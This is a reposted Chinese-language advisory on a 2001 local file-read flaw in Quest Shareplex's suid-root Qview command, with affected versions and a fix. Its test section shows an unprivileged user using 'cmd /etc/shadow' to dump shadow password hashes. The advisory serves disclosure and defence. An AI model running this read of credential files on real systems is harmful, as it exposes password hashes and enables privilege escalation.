Shareplex 读取任意本地文件漏洞

发布日期：2001-04-09
更新日期：2001-04-09

受影响系统：

Quest Shareplex 2.2.2 beta
- Sun Solaris 2.6
- HP HP-UX 11.0
- HP HP-UX 10.20
Quest Shareplex 2.1.3.9
- Sun Solaris 2.6
- HP HP-UX 11.0
- HP HP-UX 10.20

不受影响系统：

Quest Shareplex 2.1.3.21
- Sun Solaris 2.6
- IBM AIX 3.0x
- HP HP-UX 11.0
- HP HP-UX 10.20
- Digital OSF/1 4.0
- Sun Solaris 2.6
- IBM AIX 3.0x
- HP HP-UX 11.0
- HP HP-UX 10.20

描述：

---

Shareplex 是 Quest Software开发的数据库复制工具。某些版本的Shareplex存在安
全漏洞，使得本地普通用户可以读取任意文件。

Shareplex 携带了一个命令 Qview，它允许用户指定一个本地文件作为Qview命令输
入，如果该命令文件所包含的内容不是有效的Qview命令，将在标准错误输出上显示
该文件内容。由于Qview是suid-to-root了的，显然本地攻击者可以利用这个缺陷读
取任意本地文件，包括/etc/shadow。

该漏洞潜在导致本地安全性能的极大损害。

<* 来源：Dixie Flatline (echo8@gh0st.net) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ id
uid=500(foo) gid=200(bar)
$ cd <path to shareplex binaries>
$ ./qview
qdump> cmd /etc/shadow
Executing: root:xDmyz1K9xRKRo:11236::::::
invalid command root:xDmyz1K9xRKRo:11236::::::
...
Executing: splex:BdJCfh1D32hzo:11290::::::
invalid command splex:BdJCfh1D32hzo:11290::::::
Executing: foo:2MQXUgAcnOcEU:11344::::::
invalid command foo:2MQXUgAcnOcEU:11344::::::
qdump> quit
$



建议：

---

临时解决方案是修正Qview命令的权限设置，去掉suid-to-root设置。
SharePlex 2.1.3.21及其以上版本已经修正了该问题。

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有